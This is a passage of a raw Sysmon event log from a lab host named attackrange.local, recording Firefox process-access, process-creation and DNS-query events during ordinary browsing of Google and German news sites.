Files\Mozilla Firefox\xul.dll+3e1a2fb|C:\Program Files\Mozilla Firefox\xul.dll+3e1ba98|C:\Program Files\Mozilla Firefox\xul.dll+3e1bf63|C:\Program Files\Mozilla Firefox\firefox.exe+15a1|C:\Program Files\Mozilla Firefox\firefox.exe+5ae18|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017254Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70524608C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x101451C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+f7b5aa|C:\Program Files\Mozilla Firefox\xul.dll+9c8ee4|C:\Program Files\Mozilla Firefox\xul.dll+e485|C:\Program Files\Mozilla Firefox\xul.dll+f532a1|C:\Program Files\Mozilla Firefox\xul.dll+e1b5|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+c0a4|C:\Program Files\Mozilla Firefox\xul.dll+f53f81|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017253Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017252Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017251Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017250Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-8E46-6005-0C00-00000000A301}5961056C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017249Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-93F6-6005-E604-00000000A301}48883504C:\Windows\system32\csrss.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000017248Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}70526964C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\ADVAPI32.dll+1845f|C:\Program Files\Mozilla Firefox\firefox.exe+50312|C:\Program Files\Mozilla Firefox\firefox.exe+2d163|C:\Program Files\Mozilla Firefox\xul.dll+9cb21b|C:\Program Files\Mozilla Firefox\xul.dll+f7278c|C:\Program Files\Mozilla Firefox\xul.dll+f70052|C:\Program Files\Mozilla Firefox\xul.dll+f7c85e|C:\Program Files\Mozilla Firefox\xul.dll+a81e44|C:\Program Files\Mozilla Firefox\xul.dll+3af91|C:\Program Files\Mozilla Firefox\xul.dll+39cbd|C:\Program Files\Mozilla Firefox\xul.dll+f5c7ff|C:\Program Files\Mozilla Firefox\xul.dll+e11e|C:\Program Files\Mozilla Firefox\xul.dll+a88d85|C:\Program Files\Mozilla Firefox\nss3.dll+12e8aa|C:\Program Files\Mozilla Firefox\nss3.dll+11f961|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000017247Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.461{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe84.0.2FirefoxFirefoxMozilla Corporationfirefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="7052.41.610208362\2054878469" -childID 6 -isForBrowser -prefsHandle 2500 -prefMapHandle 2496 -prefsLen 12864 -prefMapSize 229288 -parentBuildID 20210105180113 -appdir "C:\Program Files\Mozilla Firefox\browser" - 7052 "\\.\pipe\gecko-crash-server-pipe.7052" 2484 tabC:\Program Files\Mozilla Firefox\ATTACKRANGE\Administrator{59A5CD1D-93F8-6005-49A2-2C0000000000}0x2ca2492LowMD5=6B3FC10BA1FB445C6772D076860B0F3B,SHA256=080A31499728B001B28FA8A386A73A800A190B91B129127E597D8E67549C1D86,IMPHASH=5ED80EE3BE69CAE0F2D23403B0DC50DC{59A5CD1D-945A-6005-3305-00000000A301}7052C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -first-startup 10341000x800000000000000017246Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-8E46-6005-1200-00000000A301}12124900C:\Windows\System32\svchost.exe{59A5CD1D-9468-6005-3D05-00000000A301}5136C:\Program Files\Mozilla Firefox\firefox.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\pcasvc.dll+ac06|c:\windows\system32\pcasvc.dll+aa66|c:\windows\system32\pcasvc.dll+aa28|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000017245Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.443{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945F-6005-3805-00000000A301}4560C:\Program Files\Mozilla Firefox\firefox.exe0x2200C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1216761|C:\Program Files\Mozilla Firefox\xul.dll+2bd81dd|C:\Program Files\Mozilla Firefox\xul.dll+2bd0ec9|C:\Program Files\Mozilla Firefox\xul.dll+2bd18cd|C:\Program Files\Mozilla Firefox\xul.dll+2ba6aa4|C:\Program Files\Mozilla Firefox\xul.dll+3aeb1ce|C:\Program Files\Mozilla Firefox\xul.dll+ec31bc|C:\Program Files\Mozilla Firefox\xul.dll+ec661f|C:\Program Files\Mozilla Firefox\xul.dll+e1e321|C:\Program Files\Mozilla Firefox\xul.dll+348add|C:\Program Files\Mozilla Firefox\xul.dll+ecf5e7|C:\Program Files\Mozilla Firefox\xul.dll+e4a21b|C:\Program Files\Mozilla Firefox\xul.dll+e4f3f3|C:\Program Files\Mozilla Firefox\xul.dll+e4d68c|C:\Program Files\Mozilla Firefox\xul.dll+e4cc68|C:\Program Files\Mozilla Firefox\xul.dll+e4be9b|C:\Program Files\Mozilla Firefox\xul.dll+e5d03e|C:\Program Files\Mozilla Firefox\xul.dll+b50c92|C:\Program Files\Mozilla Firefox\xul.dll+a59587|C:\Program Files\Mozilla Firefox\xul.dll+a7a329|C:\Program Files\Mozilla Firefox\xul.dll+a7febd|C:\Program Files\Mozilla Firefox\xul.dll+3a8b3 10341000x800000000000000017244Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.224{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971 10341000x800000000000000017243Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.224{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+1620463|C:\Program Files\Mozilla Firefox\xul.dll+1620406|C:\Program Files\Mozilla Firefox\xul.dll+16205dc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8 10341000x800000000000000017242Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.224{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017241Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.224{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017240Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.967{59A5CD1D-945A-6005-3305-00000000A301}7052pki-goog.l.google.com02a00:1450:4001:825::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017239Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.965{59A5CD1D-945A-6005-3305-00000000A301}7052pki-goog.l.google.com0216.58.208.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017238Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.964{59A5CD1D-945A-6005-3305-00000000A301}7052ocsp.pki.goog0type: 5 pki-goog.l.google.com;::ffff:216.58.208.35;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017237Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.950{59A5CD1D-945A-6005-3305-00000000A301}7052www.google.com02a00:1450:4001:81d::2004;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017236Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.948{59A5CD1D-945A-6005-3305-00000000A301}7052www.google.com0172.217.16.164;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017235Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:05.947{59A5CD1D-945A-6005-3305-00000000A301}7052www.google.com0::ffff:172.217.16.164;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017328Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:07.261{59A5CD1D-945A-6005-3305-00000000A301}7052netzpolitik.org02a01:4f8:141:304c::3;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017327Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:07.259{59A5CD1D-945A-6005-3305-00000000A301}7052netzpolitik.org0176.9.0.108;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017326Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:07.259{59A5CD1D-945A-6005-3305-00000000A301}7052taz.de0193.104.220.23;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017325Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:07.259{59A5CD1D-945A-6005-3305-00000000A301}7052netzpolitik.org0::ffff:176.9.0.108;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017324Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:07.259{59A5CD1D-945A-6005-3305-00000000A301}7052taz.de0::ffff:193.104.220.23;C:\Program Files\Mozilla Firefox\firefox.exe 10341000x800000000000000017349Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:10.192{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+14cb20f|C:\Program Files\Mozilla Firefox\xul.dll+14c915d|C:\Program Files\Mozilla Firefox\xul.dll+16114d2|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0|C:\Program Files\Mozilla Firefox\xul.dll+2decdcc|C:\Program Files\Mozilla Firefox\xul.dll+2f2561|C:\Program Files\Mozilla Firefox\xul.dll+2fe3a99|C:\Program Files\Mozilla Firefox\xul.dll+2fe8b21|C:\Program Files\Mozilla Firefox\xul.dll+2fe8971|C:\Program Files\Mozilla Firefox\xul.dll+2fe8512|C:\Program Files\Mozilla Firefox\xul.dll+2fe7eea|C:\Program Files\Mozilla Firefox\xul.dll+2fe8ebf 10341000x800000000000000017348Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:10.192{59A5CD1D-945A-6005-3305-00000000A301}70527048C:\Program Files\Mozilla Firefox\firefox.exe{59A5CD1D-945C-6005-3405-00000000A301}6976C:\Program Files\Mozilla Firefox\firefox.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Mozilla Firefox\xul.dll+1e6991|C:\Program Files\Mozilla Firefox\xul.dll+451791|C:\Program Files\Mozilla Firefox\xul.dll+493b79|C:\Program Files\Mozilla Firefox\xul.dll+493b19|C:\Program Files\Mozilla Firefox\xul.dll+f88d36|C:\Program Files\Mozilla Firefox\xul.dll+4939c4|C:\Program Files\Mozilla Firefox\xul.dll+14e9a81|C:\Program Files\Mozilla Firefox\xul.dll+14e9839|C:\Program Files\Mozilla Firefox\xul.dll+14c9dd4|C:\Program Files\Mozilla Firefox\xul.dll+14c9be8|C:\Program Files\Mozilla Firefox\xul.dll+14c9a84|C:\Program Files\Mozilla Firefox\xul.dll+16114b3|C:\Program Files\Mozilla Firefox\xul.dll+1611407|C:\Program Files\Mozilla Firefox\xul.dll+160e21f|C:\Program Files\Mozilla Firefox\xul.dll+16061f7|C:\Program Files\Mozilla Firefox\xul.dll+16204bc|C:\Program Files\Mozilla Firefox\xul.dll+1604385|C:\Program Files\Mozilla Firefox\xul.dll+16048c3|C:\Program Files\Mozilla Firefox\xul.dll+485ee8|C:\Program Files\Mozilla Firefox\xul.dll+46738b|C:\Program Files\Mozilla Firefox\xul.dll+2f38b9|C:\Program Files\Mozilla Firefox\xul.dll+2dedfc0 22542200x800000000000000017347Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.951{59A5CD1D-945A-6005-3305-00000000A301}7052plus.l.google.com02a00:1450:4001:809::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017346Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.949{59A5CD1D-945A-6005-3305-00000000A301}7052plus.l.google.com0216.58.205.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017345Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.949{59A5CD1D-945A-6005-3305-00000000A301}7052apis.google.com0type: 5 plus.l.google.com;::ffff:216.58.205.238;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017344Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.889{59A5CD1D-945A-6005-3305-00000000A301}7052gstaticadssl.l.google.com02a00:1450:4001:806::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017343Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.887{59A5CD1D-945A-6005-3305-00000000A301}7052gstaticadssl.l.google.com0142.250.74.195;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017342Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.886{59A5CD1D-945A-6005-3305-00000000A301}7052fonts.gstatic.com0type: 5 gstaticadssl.l.google.com;::ffff:142.250.74.195;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017341Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.841{59A5CD1D-945A-6005-3305-00000000A301}7052www.gstatic.com02a00:1450:4001:81f::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017340Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.839{59A5CD1D-945A-6005-3305-00000000A301}7052www.gstatic.com0216.58.212.163;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017339Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.838{59A5CD1D-945A-6005-3305-00000000A301}7052www.gstatic.com0::ffff:216.58.212.163;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017338Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.463{59A5CD1D-945A-6005-3305-00000000A301}7052consent.google.com02a00:1450:4001:808::200e;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017337Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.459{59A5CD1D-945A-6005-3305-00000000A301}7052consent.google.com0216.58.212.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017336Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.459{59A5CD1D-945A-6005-3305-00000000A301}7052consent.google.com0::ffff:216.58.212.142;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017335Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.451{59A5CD1D-945A-6005-3305-00000000A301}7052ssl.gstatic.com02a00:1450:4001:801::2003;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017334Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.449{59A5CD1D-945A-6005-3305-00000000A301}7052ssl.gstatic.com0172.217.16.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017333Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.448{59A5CD1D-945A-6005-3305-00000000A301}7052ssl.gstatic.com0::ffff:172.217.16.131;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017332Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.363{59A5CD1D-945A-6005-3305-00000000A301}7052e12746.g.akamaiedge.net9501-C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017331Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.361{59A5CD1D-945A-6005-3305-00000000A301}7052e12746.g.akamaiedge.net0104.79.89.121;C:\Program Files\Mozilla Firefox\firefox.exe 22542200x800000000000000017330Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 14:00:08.361{59A5CD1D-945A-6005-3305-00000000A301}7052www.faz.net0type: 5 www.faz.net.edgekey.net;type: 5 e12746.g.akamaiedge.net;::ffff:104.79.89.121;C:\Program Files\Mozilla Firefox\firefox.exe 